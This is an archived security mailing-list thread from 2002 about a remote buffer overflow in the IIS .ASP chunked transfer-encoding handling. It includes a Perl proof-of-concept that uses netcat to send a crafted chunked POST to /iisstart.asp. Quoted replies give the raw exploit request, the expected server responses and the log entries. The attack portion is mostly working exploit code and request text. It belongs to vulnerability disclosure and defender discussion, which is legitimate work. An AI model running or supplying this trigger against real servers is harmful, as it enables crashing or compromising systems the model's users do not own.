RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow

[damdum <damdum () ghettohackers net>]

It should be noted that the request must be properly formatted (not sloppy),
this means using CRLF not just LF.  Here is a quick perl proggy:

use IPC::Open2;

$pid = open2(\*IN, \*OUT, "nc -nv 10.10.10.69 80");

print OUT "POST /iisstart.asp HTTP/1.1\r\n".
    "Accept: */*\r\n".
    "Host: victom.com\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Transfer-Encoding: chunked\r\n".
    "\r\n".  
    "10\r\n".
    "PADPADPADPADPADP\r\n".
    "4\r\n".   
    "DATA\r\n".
    "4\r\n".   
    "DEST\r\n".
    "0\r\n";

$buff = <IN>;
if($buff =~ /HTTP\/1\.1 100 Continue/)
{
    print "Got HTTP 100 Continue, sending returns...\n";
    sleep 1;

    print OUT "\r\n\r\n\r\n";
    print OUT "\r\n\r\n\r\n";

    print "Done\n";
}   
else
{
    print "Hrmm, didn't find HTTP 100 Continue, bye.\n";
}

close IN; 
close OUT;


-- 
damdum


Quoting MadHat <madhat () unspecific com>:

> I have not been able to reproduce these results.  I have managed to lock
> up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages
> appear and no entries in the Application Log.  I have also been able get
> the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but
> still no popup or messages.
>
> Is there a reliable way to scan for these vulnerabilities remotely?
>
> On Thu, 2002-04-11 at 11:25, Erik Parker wrote:
> > JM> Anyone have a proof of concept for this exploit?
> >
> > eEye included some. Use this with "netcat" or "telnet"
> >
> > replace [enter] with an actual pressing of your enter key (look at the
> > bottom, you can cut n paste)
> >
> > It should return something like this, if it worked (and generate a popup
> > error to you that says "Unknown has generated errors")
> >
> > HTTP/1.1 100 Continue
> > Server: Microsoft-IIS/5.0
> > Date: Wed, 27 Mar 2002 23:37:32 GMT
> >
> > If it fails, it'll say something like:
> >
> > HTTP/1.1 500 Server Error
> > Server: Microsoft-IIS/5.0
> >
> >
> > The application log will say:
> >
> > Active Server Pages service has started
> > Access performance data was denied to IWAM_netbiosname as attempted from
> c:\WINNT\SYSTEM32\Drwtsn32.exe
> > **************Begin Session****************
> > POST /iisstart.asp HTTP/1.1
> > Accept: */*
> > Host: eeye.com
> > Content-Type: application/x-www-form-urlencoded
> > Transfer-Encoding: chunked
> >
> > 10
> > PADPADPADPADPADP
> > 4
> > DATA
> > 4
> > DEST
> > 0
> > [enter]
> > [enter]
> > **************End Session******************
> -- 
> MadHat at Unspecific.com
> gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
> Key fingerprint = E786 7B30 7534 DCC2 94D5  91DE E922 0B21 9DDC 3E98